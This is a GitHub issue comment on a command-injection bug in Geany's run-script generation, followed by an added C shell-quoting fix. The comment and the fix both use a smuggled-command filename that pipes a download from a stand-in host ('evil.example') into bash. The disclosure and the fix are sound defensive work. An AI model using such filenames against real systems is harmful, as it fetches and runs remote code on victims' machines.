CVE-Hunter-Leo left a comment (geany/geany#4611)

@WrapEarnPass Thanks for testing this and for the detailed feedback.

You're right that a literal `/` cannot appear in a filename on Linux. The `/` 
in my original example was inside the backtick command (i.e. part of the 
payload), not a character in the filename itself. Filenames containing 
backticks (`` ` ``), `$()`, `;`, `|`, etc. are perfectly valid on Linux/macOS.

Your modified test case (`` test`curl evil.example|bash`.c ``) confirms the core 
issue — command substitution still occurs in the generated 
`geany_run_script_*.sh`, which is exactly the problem being reported.

I also appreciate you capturing the actual shell script output. It clearly 
shows the backtick expression being executed by the shell.

Regarding CVSS:
- I had initially scored it as 7.8 (Critical) because arbitrary command 
execution is possible with a very common user action (pressing F5/Execute on a 
file received from someone else).
- Your scoring of ~6.1 is reasonable if we consider the attack requires the 
victim to open and explicitly run the file. I'm happy to go with whatever the 
maintainers decide.

On the geany-plugins point — thank you for raising it. If the same unsafe 
substitution pattern exists in plugins (geanyctags, lsp, etc.), it would be 
good to track those separately so they don't get overlooked.

I'm happy to provide more details, or adjust the issue description if needed. 
Just let me know how you'd like to proceed.

-- 
Reply to this email directly or view it on GitHub:
https://github.com/geany/geany/issues/4611#issuecomment-4846041794

Message ID: <geany/geany/issues/4611/[email protected]>
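Added example, not Geany's own code: a plain-C shell-quoting helper of the kind a run-script generator needs so that a filename is passed to the shell as one literal word, using the thread's test filename as constructed input. `shell_quote_filename` and `build_run_line` are hypothetical names; in real Geany code GLib's `g_shell_quote()` provides the same quoting.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper (added example, not Geany code): wrap a filename in
 * single quotes so a POSIX shell treats it as one literal word. Inside
 * single quotes ` $() ; | have no meaning; an embedded ' is emitted as
 * '\'' (close, escaped quote, reopen). GLib's g_shell_quote() does the
 * same job. Returns a malloc'd string the caller frees. */
char *shell_quote_filename(const char *name)
{
    size_t quotes = 0;
    for (const char *p = name; *p; p++)
        if (*p == '\'') quotes++;
    /* two outer quotes, 3 extra bytes per embedded quote, NUL */
    char *out = malloc(strlen(name) + 2 + quotes * 3 + 1);
    if (!out) return NULL;
    char *w = out;
    *w++ = '\'';
    for (const char *p = name; *p; p++) {
        if (*p == '\'') { memcpy(w, "'\\''", 4); w += 4; }
        else *w++ = *p;
    }
    *w++ = '\'';
    *w = '\0';
    return out;
}

/* Compose the run-script command with the filename quoted rather than
 * pasted verbatim, which is the defect the thread describes. */
char *build_run_line(const char *compiler, const char *filename)
{
    char *q = shell_quote_filename(filename);
    if (!q) return NULL;
    size_t n = strlen(compiler) + 1 + strlen(q) + 1;
    char *line = malloc(n);
    if (line) snprintf(line, n, "%s %s", compiler, q);
    free(q);
    return line;
}

int main(void)
{
    /* constructed sample: the filename from the thread's test case */
    char *line = build_run_line("gcc", "test`curl evil.example|bash`.c");
    puts(line); /* gcc 'test`curl evil.example|bash`.c' */
    free(line);
    return 0;
}
```

Run against the generated `geany_run_script_*.sh`, the quoted word reaches the compiler as a filename argument and the backtick sequence is never evaluated by the shell.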